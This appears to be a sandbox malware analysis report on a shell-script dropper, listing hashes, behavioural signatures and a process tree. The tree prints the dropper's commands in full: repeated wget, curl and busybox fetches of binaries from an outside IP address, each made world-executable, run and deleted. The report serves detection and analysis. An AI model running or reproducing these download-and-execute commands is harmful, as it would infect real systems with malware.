Analysis
-
max time kernel
79s -
max time network
81s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
14-11-2024 02:43
Static task
static1
Behavioral task
behavioral1
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
-
Size
10KB
-
MD5
682075683081d9fc281b9f47dbc13513
-
SHA1
a2abfb0ba39a3deacc4cd4cc13539ae72b7e1ec9
-
SHA256
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618
-
SHA512
7122fd7e2576ed1a72dc091536927c59e3e7c57c43165431b710449d59bd4df65913b942b8ce34d710d042d29c55c58cca994ca61be785e2f33a169412e0ee52
-
SSDEEP
192:m/h372hBD3KaKVRcABDoKaKVR8LV/r37Z:5nD1ABDo/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 732 chmod 852 chmod 864 chmod 918 chmod 778 chmod 807 chmod 924 chmod 930 chmod 912 chmod 747 chmod 876 chmod 906 chmod 936 chmod 960 chmod 858 chmod 870 chmod 894 chmod 738 chmod 801 chmod 843 chmod 882 chmod 942 chmod 966 chmod 900 chmod 948 chmod 888 chmod 954 chmod 972 chmod -
Executes dropped EXE 28 IoCs
Processes:
ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFShyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRRPjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlVqxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQlaiau4cN6ui4dUhdtLO7AszWQd9X2AFpm21TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpjMMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJnQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFRgKXcUWSnaVAlkPeODets4f6GbEr74zFmNMqOpad8fEABX2m6C2lykVUYrbhlTb579lU1XeSlCkRjhDywGAQfziHeoondE5FGa7JIQAeD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHyebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPSMMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJnQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFRgKXcUWSnaVAlkPeODets4f6GbEr74zFmNM1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpjqOpad8fEABX2m6C2lykVUYrbhlTb579lU1XeSlCkRjhDywGAQfziHeoondE5FGa7JIQAeD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHyebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPSODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFShyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRRPjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlVqxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQlaiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2ioc pid Process /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS 733 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR 739 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV 749 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ 779 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 802 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj 808 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ 844 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI 853 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR 859 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM 865 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 871 qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA 877 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy 883 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS 889 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ 895 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI 901 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR 907 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM 913 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj 919 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 925 qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA 931 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy 937 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS 943 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS 949 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR 955 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV 961 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ 967 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 973 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA curl File opened for modification /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS curl File opened for modification /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ curl File opened for modification /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR curl File opened for modification /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 curl File opened for modification /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV curl File opened for modification /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR curl File opened for modification /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 curl File opened for modification /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI curl File opened for modification /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj curl File opened for modification /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy curl File opened for modification /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS curl File opened for modification /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR curl File opened for modification /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ curl File opened for modification /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR curl File opened for modification /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM curl File opened for modification /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI curl File opened for modification /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA curl File opened for modification /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy curl File opened for modification /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS curl File opened for modification /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ curl File opened for modification /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 curl File opened for modification /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 curl File opened for modification /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ curl File opened for modification /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV curl File opened for modification /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS curl File opened for modification /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM curl File opened for modification /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj curl
Processes
-
/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh1⤵PID:701
-
/bin/rm/bin/rm bins.sh2⤵PID:708
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:712
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:731
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:734
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:737
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:740
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:741
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:743
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:752
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:753
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:771
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:784
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:785
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:799
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:806
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:809
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:810
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:842
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:851
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:857
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:863
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:866
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:867
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:869
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:872
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:873
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:875
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:878
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:879
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:881
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:884
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:885
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:887
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:890
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:891
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:893
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:896
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:897
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:899
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:902
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:903
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:905
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:908
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:909
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:911
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:914
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:917
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
